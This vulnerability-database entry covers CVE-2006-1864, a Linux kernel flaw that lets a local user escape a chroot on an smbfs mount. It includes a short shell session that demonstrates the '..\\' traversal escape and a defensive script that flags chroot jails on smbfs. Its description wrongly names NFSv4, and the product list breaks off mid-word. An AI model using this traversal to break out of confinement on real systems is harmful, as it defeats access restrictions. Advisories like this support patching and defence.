Linux Kernel SMBFS chroot Directory Traversal Vulnerability

Vulnerability ID: 1110151
Vulnerability type: Path traversal
Published: 2006-04-28
Updated: 2007-01-18
CVE ID: CVE-2006-1864
CNNVD-ID: CNNVD-200604-497
Platform: Linux
CVSS score: 4.6
|Vulnerability Source
https://www.exploit-db.com/exploits/27766
https://www.securityfocus.com/bid/17735
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-497
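|Vulnerability Details
The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). The NFSv4 implementation is a distributed file system protocol within it. An input validation error exists in the Linux Kernel's SMBFS mounted file system: a local attacker can use the "..\\" directory traversal sequence to bypass chroot restrictions and access restricted resources.
|Exploit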
source: http://www.securityfocus.com/bid/17735/info

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('smbfs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

[root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\
bash-2.05a# pwd
/..
bash-2.05a# ls
<list of files from parent>
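
The issue above only applies when the chroot directory sits on an smbfs mount, so a useful audit step is to map each jail path to the filesystem backing it. The following is an added example, not part of the original advisory; the mount table, host name and jail paths in it are constructed, and it assumes `/proc/mounts`-style input without escaped spaces in mount points.

```sh
#!/bin/sh
# Added example (not from the advisory): find which filesystem type backs a
# chroot directory, so jails that sit on an smbfs mount can be flagged.
# Assumption: mounts are listed in /proc/mounts format (device, mount point,
# type, options, ...); mount points containing spaces (\040) are not decoded.

# fstype_for_path PATH [MOUNTS_FILE] -> prints the type of the deepest mount
# point that contains PATH.
fstype_for_path() {
    local target="$1" mounts="${2:-/proc/mounts}"
    local dev mnt fstype rest best_len=-1 best_type=""
    while read -r dev mnt fstype rest; do
        # A mount covers the target if it is "/", the target itself, or a
        # parent directory of it ("/path/to" must not match "/path/tomato").
        if [ "$mnt" = "/" ] || [ "$target" = "$mnt" ] ||
           [ "${target#"$mnt"/}" != "$target" ]; then
            # Deepest mount wins; on a tie the later (overmounting) entry wins.
            if [ "${#mnt}" -ge "$best_len" ]; then
                best_len=${#mnt}
                best_type="$fstype"
            fi
        fi
    done < "$mounts"
    printf '%s\n' "$best_type"
}

# chroot_on_smbfs PATH [MOUNTS_FILE] -> exit status 0 if PATH lives on smbfs.
chroot_on_smbfs() {
    [ "$(fstype_for_path "$1" "${2:-/proc/mounts}")" = "smbfs" ]
}

# Constructed sample mount table (hypothetical host and devices).
SAMPLE_MOUNTS=$(mktemp)
trap 'rm -f "$SAMPLE_MOUNTS"' EXIT
cat > "$SAMPLE_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw 0 0
//fileserver/share /path/to smbfs rw 0 0
/dev/sda2 /path/tomato ext3 rw 0 0
EOF

for jail in /path/to/my/dir /path/tomato/jail /srv/jail; do
    if chroot_on_smbfs "$jail" "$SAMPLE_MOUNTS"; then
        echo "WARN: $jail is on smbfs (see CVE-2006-1864)"
    else
        echo "ok:   $jail"
    fi
done
```

On a live host, omit the second argument so the functions read `/proc/mounts`.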
|Affected Products
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.3 Patch 2
VMWare ESX Server 2.1.3 Patch 1
VMWare ESX Server 2.0.2 Patch 1
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Lin
|References

Source: bugzilla.redhat.com
Link: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189435
Source: XF
Name: kernel-smbfs-directory-traversal(26137)
Link: http://xforce.iss.net/xforce/xfdb/26137
Source: www.vmware.com
Link: http://www.vmware.com/download/esx/esx-254-200610-patch.html
Source: www.vmware.com
Link: http://www.vmware.com/download/esx/esx-213-200610-patch.html
Source: www.vmware.com
Link: http://www.vmware.com/download/esx/esx-202-200610-patch.html
Source: UBUNTU
Name: USN-302-1
Link: http://www.ubuntu.com/usn/usn-302-1
Source: TRUSTIX
Name: 2006-0026
Link: http://www.trustix.org/errata/2006/0026
Source: BID
Name: 17735
Link: http://www.securityfocus.com/bid/17735
Source: BUGTRAQ
Name: 20061113 VMSA-2006-0008 - VMware ESX Server 2.0.2 Upgrade Patch 2
Link: http://www.securityfocus.com/archive/1/archive/1/451426/100/200/threaded
Source: BUGTRAQ
Name: 20061113 VMSA-2006-0005 - VMware ESX Server 2.5.4 Upgrade Patch 1
Link: http://www.securityfocus.com/archive/1/archive/1/451419/100/200/threaded
Source: BUGTRAQ
Name: 20061113 VMSA-2006-0007 - VMware ESX Server 2.1.3 Upgrade Patch 2
Link: http://www.securityf